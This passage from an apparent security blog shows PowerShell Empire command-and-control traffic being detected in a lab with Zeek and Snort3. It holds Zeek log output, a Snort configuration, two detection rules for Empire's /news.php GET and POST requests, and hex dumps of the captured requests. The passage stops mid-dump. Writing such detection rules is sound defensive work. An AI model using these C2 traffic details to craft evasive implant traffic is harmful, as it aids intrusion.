<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] Hunting for POWERSHELL EMPIRE Activity ... </span>
<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-FJAtZe4W1F6uRwvmM3-news.php</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-FbbFCu4T8l288RA3R7-news.php</span>
<span style="color: white;"> \-> Extracted file: HTTP-FIWqGKoACo24S6dS8-news.php</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-F4wiHG1bpwW03v71vh-news.php</span>
<span style="color: white;"> \-> Extracted file: HTTP-FghBlt1qKU0utYSHd7-news.php</span>
<span style="color: white;">...</span>
<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] We have 1807 hits for Powershell related IoCs</span>
<span style="color: white;">[*] There is/are 1 unique IP(s) across the 1807 hits</span>
<span style="color: white;"> \- 10.0.0.110</span>
<span style="color: white;">[*] Zeek has ended. :-( </span>
</pre></div>
</div> <div><div>Notice above it says we extracted the files. Let's verify that by using ls on the <i>extract_files</i> folder</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ ls extract_files/</span>
<span style="color: white;">HTTP-F04ExA4j0mLQtMJfxd-get.php HTTP-Fesf2Y3CmRhWycz7Pf-process.php HTTP-Fp6Yax4DsWlpbttqR6-news.php</span>
<span style="color: white;">HTTP-F04Fi9X4phawyMEXl-news.php HTTP-FeshuKrFfyOgA6uH5-process.php HTTP-FPCjffBSpvM3iS48f-process.php</span>
<span style="color: white;">HTTP-F05oktdIUrPchmqg-news.php HTTP-FEskgT2JF9cCFwnBcf-get.php HTTP-FpcYVS1xKGD4yv2rCb-get.php</span>
<span style="color: white;">HTTP-F05vS52MRDIDb1BIyi-process.php HTTP-Festcg1mUFuQygmVe-get.php HTTP-FPeqrG4Ur8DlkjgYv4-process.php</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Looks good!<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek-cut -d ts fuid tx_hosts rx_hosts conn_uids source filename sha256 < files.log | more</span>
<span style="color: white;">2021-11-20T13:03:59-0500 FJAtZe4W1F6uRwvmM3 10.0.0.107 10.0.0.110 CjvLUV2ZfpZGgNfiHj HTTP - 41ab2b2d10eb9fdcf1d667ec4f45db99ec1761c06a4e2d61a789710fb0c08a04</span>
<span style="color: white;">2021-11-20T13:04:02-0500 FbbFCu4T8l288RA3R7 10.0.0.110 10.0.0.107 CjvLUV2ZfpZGgNfiHj HTTP - bf896ec20bad0ee772db7ea44b6bf45c2b7401687808bf8474591f0e1612b01c</span>
<span style="color: white;">2021-11-20T13:04:02-0500 FIWqGKoACo24S6dS8 10.0.0.107 10.0.0.110 CjvLUV2ZfpZGgNfiHj HTTP - 600df9d2f01f3388e2154bfacc557b6add77cddce147b1cdebc30ad188b57edb</span>
</pre></div>
</div><div><br /></div><div>Looking at our custom log file PSempire.log.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek-cut -d -m < PSEmpire.log | more </span>
<span style="color: white;">ts src_host src_port dst_host dst_port msg</span>
<span style="color: white;">2021-11-20T13:03:59-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:04:02-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:04:03-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:05:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:06:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:07:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:08:07-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:09:07-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Well That's it for this post and this series.<br /><br /></div><div><p><b>Other posts in this series:</b><br /></p><p><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-attack-in.html" target="_blank">Beginning Powershell Empire - The Attack in 10 steps</a><br /><a href="Beginning PowerShell Empire - Log Analysis" target="_blank">Powershell Empire Log Analysis</a><br /><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-packet.html" target="_blank">Powershell Empire Packet Analysis</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-snort3.html" target="_blank">Powershell Empire Detection with Snort</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-zeek.html" target="_blank">Powershell Empire - Detection with Zeek</a></p><br /><br /></div><div><br /></div><div><div>References:</div><div><a href="https://zeek.org/2020/06/08/7-dos-and-donts-for-zeek-scripting/">https://zeek.org/2020/06/08/7-dos-and-donts-for-zeek-scripting/</a></div><div><a href="https://old.zeek.org/brocon2018/slides/Aashish_Sharma.pdf">https://old.zeek.org/brocon2018/slides/Aashish_Sharma.pdf</a></div><div><a href="https://docs.zeek.org/en/master/logs/conn.html">https://docs.zeek.org/en/master/logs/conn.html</a></div><div><a href="https://docs.zeek.org/en/master/logs/files.html">https://docs.zeek.org/en/master/logs/files.html</a></div><div><a href="https://docs.zeek.org/en/master/frameworks/signatures.html">https://docs.zeek.org/en/master/frameworks/signatures.html</a></div><div><a href="https://sansorg.egnyte.com/dl/8VIrX1K87d/?">https://sansorg.egnyte.com/dl/8VIrX1K87d/?</a></div><div><a href="https://docs.zeek.org/en/master/frameworks/notice.html">https://docs.zeek.org/en/master/frameworks/notice.html</a></div><div><a href="http://ce.sc.edu/cyberinfra/docs/workshop/Bro%20Intrusion%20Detection%20System%20(IDS).pdf">http://ce.sc.edu/cyberinfra/docs/workshop/Bro%20Intrusion%20Detection%20System%20(IDS).pdf</a></div><div><a href="http://ce.sc.edu/cyberinfra/workshops/Material/Zeek/Lab%206.pdf">http://ce.sc.edu/cyberinfra/workshops/Material/Zeek/Lab%206.pdf</a></div><div><a href="https://www.youtube.com/watch?v=XXGVi2JF-v0">https://www.youtube.com/watch?v=XXGVi2JF-v0</a></div></div><div><br /></div><div><br /></div><div><br /></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-24469773228482440402022-02-02T18:53:00.002-08:002022-02-02T19:00:31.799-08:00Powershell Empire - Detection with Snort3<div>Do keep in mind, as I write these rules, this is basically from a learning perspective. Putting these into production, does not mean you will have the same detection. This is primarily because these values can be changed by the threat actor, thus resulting in an evasion of your IDS/IPS. This is being done primarily from my lab's perspective.</div><div><br /></div><div>First verifying the version of Snort being used.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/snort-files/snort3-3.1.18.0/build]</span>
<span style="color: white;">└─# snort --version </span>
<span style="color: white;"> ,,_ -*> Snort++ <*-</span>
<span style="color: white;"> o" )~ Version 3.1.18.0</span>
<span style="color: white;"> '''' By Martin Roesch & The Snort Team</span>
<span style="color: white;"> http://snort.org/contact#team</span>
<span style="color: white;"> Copyright (C) 2014-2021 Cisco and/or its affiliates. All rights reserved.</span>
<span style="color: white;"> Copyright (C) 1998-2013 Sourcefire, Inc., et al.</span>
<span style="color: white;"> Using DAQ version 3.0.5</span>
<span style="color: white;"> Using LuaJIT version 2.1.0-beta3</span>
<span style="color: white;"> Using OpenSSL 1.1.1l 24 Aug 2021</span>
<span style="color: white;"> Using libpcap version 1.10.1 (with TPACKET_V3)</span>
<span style="color: white;"> Using PCRE version 8.44 2020-02-12</span>
<span style="color: white;"> Using ZLIB version 1.2.11</span>
<span style="color: white;"> Using FlatBuffers 2.0.5</span>
<span style="color: white;"> Using Hyperscan version 5.4.0 2021-12-11</span>
<span style="color: white;"> Using LZMA version 5.2.5</span>
</pre></div>
</div><div><br /></div><div><div>Creating my configuration file (<i>snort.lua</i>) and our rule files (<i>local.rules</i>) to use for this post.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# touch snort.lua && touch local.rules</span>
</pre></div>
</div><div><br /></div><div>Testing the configuration and rule file along with some command line options, I will be using.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --tweaks talos --pcap-show -k none -d -R local.rules -v -c snort.lua --daq pcap -T</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">o")~ Snort++ 3.1.18.0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Loading snort.lua:</span>
<span style="color: white;"> hosts</span>
<span style="color: white;"> host_cache</span>
<span style="color: white;"> active</span>
<span style="color: white;"> packets</span>
<span style="color: white;"> decode</span>
<span style="color: white;"> so_proxy</span>
<span style="color: white;"> trace</span>
<span style="color: white;"> search_engine</span>
<span style="color: white;"> process</span>
<span style="color: white;"> network</span>
<span style="color: white;"> host_tracker</span>
<span style="color: white;"> output</span>
<span style="color: white;"> daq</span>
<span style="color: white;"> alerts</span>
<span style="color: white;">Finished snort.lua:</span>
<span style="color: white;">Loading rule args:</span>
<span style="color: white;">Loading local.rules:</span>
<span style="color: white;">Finished local.rules:</span>
<span style="color: white;">Finished rule args:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Network Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Inspection Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">so_proxy:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">pcap DAQ configured to read-file.</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">host_cache</span>
<span style="color: white;"> memcap: 8388608 bytes</span>
<b><span style="color: #fcff01;"><span>Snort successfully validated the configuration (with 0 warnings).</span>
</span></b><span style="color: white;">o")~ Snort exiting</span>
</pre></div>
</div><div><br /></div><div>Ok rather than continuing to learn more about Snort, let's jump right into our configuration file and the rules. See the reference for one of my <a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html" target="_blank">previous blogs</a> on building Snort3. I will add comments to the <i>snort.lua</i> and <i>local.rules </i>to ensure we understand what my rules are doing. Additionally, I will be taking advantage of both the service rules as well as the traditional snort2 rules structure.</div><div><div><br /></div><div>Somethings to keep in mind, when writing rules, focus on the vulnerability not the exploit. Focus on what you have control over, not what the attackers do. Focus on what is leaving your network more than what is entering your network.</div><div><br /></div><div>Let's go!</div><div><br /></div><div>Here is the custom <i>snort.lua </i>configuration file I am using.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">-- take advantage of Snort3 defaults</span>
<span style="color: white;">include '/usr/local/etc/snort/snort_defaults.lua' </span>
<span style="color: white;">-- take advantage of snort default classifications</span>
<span style="color: white;">classifications = default_classifications</span>
<span style="color: white;">-- Tell Snort3 what is our protected network so it can monitor it.</span>
<span style="color: white;">HOME_NET = [[10.0.0.110/32]]</span>
<span style="color: white;">-- This represents every network other than our protected network </span>
<span style="color: white;">EXTERNAL_NET = '!$HOME_NET'</span>
<span style="color: white;">local_variables = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> nets = </span>
<span style="color: white;"><span> <span> </span></span>{</span>
<span style="color: white;"> <span> </span>HOME_NET = HOME_NET,</span>
<span style="color: white;"> <span> </span>EXTERNAL_NET = EXTERNAL_NET,</span>
<span style="color: white;"> }</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">ips = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> <span> </span>variables = local_variables</span>
<span style="color: white;"> } </span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">-- Be able to profile the activities, get statistics</span>
<span style="color: white;">profiler = { }</span>
<span style="color: white;">-- Enable the Stream Inspector</span>
<span style="color: white;">stream = { }</span>
<span style="color: white;">-- Reasemmebe TCP</span>
<span style="color: white;">stream_ip = { </span>
<span style="color: white;"> policy = "windows";</span>
<span style="color: white;"> }</span>
<span style="color: white;">-- Reasemmebe TCP</span>
<span style="color: white;">stream_tcp = {</span>
<span style="color: white;"> policy = "windows";</span>
<span style="color: white;"> require_3whs = 300;</span>
<span style="color: white;"> track_only = false;</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">-- setup a binder</span>
<span style="color: white;">wizard = default_wizard</span>
<span style="color: white;">binder = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> <span> </span>{ when = { proto = 'tcp', ports = [[80 443]] }, use = { type = 'http_inspect' } },</span>
<span style="color: white;"> <span> </span>{ when = { service = 'http' }, use = { type = 'http_inspect' } }, </span>
<span style="color: white;"> <span> </span>{ use = { type = 'wizard' } }, </span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;">-- Define the HTTP inspector</span>
<span style="color: white;">http_inspect = { }</span>
<span style="color: white;"> </span>
<span style="color: white;">event_filter =</span>
<span style="color: white;">{</span>
<span style="color: white;">-- alerts once per 60 seconds then ignore any additional events during the 60 seconds.</span>
<span style="color: white;"> { gid = 1, sid = 4000001, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000002, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000003, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000004, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> </span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div>Below represents the contents of my local.rules file after the first rule is developed.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /news.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> <span> </span></span>rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /news.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/news.php", distance 0, within 9, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Look in the HTTP header for Connection: Keep-Alive";</span>
<span style="color: white;"> http_header: field Connection;</span>
<span style="color: white;"> content: "Keep-Alive", nocase;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> regex: "/.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000001;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>When this rule is run against the pcap.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:03:59.632367 [**] [1:4000001:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected" [**] [Classification: Known malware command and control traffic] [Priority: 1]</span>
<span style="color: white;"> {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[9]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6E 65 77 73 2E 70 68 70 /news.ph p</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[93]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 73 65 63 75 User-Age nt: secu</span>
<span style="color: white;">72 69 74 79 6E 69 6B 2D 6C 61 75 6E 63 68 65 72 ritynik- launcher</span>
<span style="color: white;">2D 62 61 74 2D 55 73 65 72 2D 41 67 65 6E 74 0D -bat-Use r-Agent.</span>
<span style="color: white;">0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span>
<span style="color: white;">37 3A 34 34 33 0D 0A 43 6F 6E 6E 65 63 74 69 6F 7:443..C onnectio</span>
<span style="color: white;">6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 n: Keep- Alive</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[61]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">53 65 63 75 72 69 74 79 4E 69 6B 2D 48 54 54 50 Security Nik-HTTP</span>
<span style="color: white;">2D 4C 69 73 74 65 6E 65 72 2D 43 6F 6F 6B 69 65 -Listene r-Cookie</span>
<span style="color: white;">3D 5A 4F 6B 4D 77 38 59 6A 6B 57 32 34 4C 30 41 =ZOkMw8Y jkW24L0A</span>
<span style="color: white;">78 61 63 49 4C 65 38 65 72 4C 38 73 3D xacILe8e rL8s=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
</div><div><br /></div><div>Good stuff, looking at the summary.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 14000001 10 12 3 3 556 46 145 13 0 0</span>
</pre></div>
</div><div><br /></div><div><div>We made progress there. Moving to the second rule within the <i>local.rules</i> file, looking for the POST. I will copy most of the content above while making this into a service rule. Additionally, I will look for data at 420 bytes within the body of the HTTP message.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert http</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /news.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method POST. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|50 4F 53 54|", offset 0, depth 4;</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span>rem: "find the string /news.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/news.php", distance 0, within 9, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for content greater than 400 bytes in the body of the message";</span>
<span style="color: white;"> http_client_body; </span>
<span style="color: white;"> isdataat: 420, relative;</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000002;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div>When executed, here is what I see.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:04:02.701119 [**] [1:4000002:10] "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected" [**] [Classification: Known malware command and control traffic] [Priority: 1</span>
<span style="color: white;">] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[4]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">50 4F 53 54 POST</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[9]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6E 65 77 73 2E 70 68 70 /news.ph p</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[90]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 73 65 63 75 User-Age nt: secu</span>
<span style="color: white;">72 69 74 79 6E 69 6B 2D 6C 61 75 6E 63 68 65 72 ritynik- launcher</span>
<span style="color: white;">2D 62 61 74 2D 55 73 65 72 2D 41 67 65 6E 74 0D -bat-Use r-Agent.</span>
<span style="color: white;">0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span>
<span style="color: white;">37 3A 34 34 33 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 7:443..C ontent-L</span>
<span style="color: white;">65 6E 67 74 68 3A 20 34 36 32 ength: 4 62</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_client_body[462]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">8B 8D 84 5C 4A D7 63 63 B5 F8 11 9C 17 CE 19 A2 ...\J.cc ........</span>
<span style="color: white;">4C 6F F2 79 7F CE BD 41 A3 F3 D5 DC AD BA AF 00 Lo.y...A ........</span>
<span style="color: white;">C1 CC 4E 71 AC C9 7D 56 D0 E7 CF 67 28 B8 62 0D ..Nq..}V ...g(.b.</span>
<span style="color: white;">C2 3C 58 E7 38 68 84 38 7A C9 B7 0A 11 A8 1A FB .<X.8h.8 z.......</span>
<span style="color: white;">09 54 56 8E 4C 5F C8 6B 40 87 D2 94 4D C0 8E 76 .TV.L_.k @...M..v</span>
<span style="color: white;">86 4C B0 7D E0 AD 56 70 0E 69 D4 4F 34 07 62 EE .L.}..Vp .i.O4.b.</span>
<span style="color: white;">D2 0B F4 30 BF 56 8F EA 1A 66 2E 77 9D BB 49 1F ...0.V.. .f.w..I.</span>
<span style="color: white;">C0 1E AF 58 04 06 91 BD 34 4C 01 37 6E EC C1 2B ...X.... 4L.7n..+</span>
<span style="color: white;">CF 57 D3 9B 19 99 16 96 65 6C 09 8E 85 CD 5A B6 .W...... el....Z.</span>
<span style="color: white;">0B BE E7 36 38 9B DB 4B 7F B4 00 7C B9 D8 B8 38 ...68..K ...|...8</span>
<span style="color: white;">1E DA 91 C6 33 8C B7 29 7B A3 F9 79 33 A2 DE BB ....3..) {..y3...</span>
<span style="color: white;">D5 AB 22 3E F3 9D 8E FA 47 CE E2 E0 BF 70 90 89 ..">.... G....p..</span>
<span style="color: white;">E4 1D B8 62 A2 2C F6 DB C1 90 3A 3C 78 59 4B 54 ...b.,.. ..:<xYKT</span>
<span style="color: white;">47 9B EC 15 9C CA C8 D8 C1 98 A8 37 7C 24 38 59 G....... ...7|$8Y</span>
<span style="color: white;">E7 27 71 AC BC 87 A1 1F E4 00 96 F6 4C 90 3D 25 .'q..... ....L.=%</span>
<span style="color: white;">78 85 75 11 80 00 A1 AC 03 3C 4D 9D 09 75 8A 46 x.u..... .<M..u.F</span>
<span style="color: white;">B8 54 85 86 2F D0 99 C8 F9 7A 5D 50 6F 61 D7 A7 .T../... .z]Poa..</span>
<span style="color: white;">06 FF F6 70 9F AB 57 2C A1 BD CA B4 4F 10 B7 D1 ...p..W, ....O...</span>
<span style="color: white;">E5 E6 F4 F1 63 C9 6D 6C F5 41 8F 31 3F 3B 90 3E ....c.ml .A.1?;.></span>
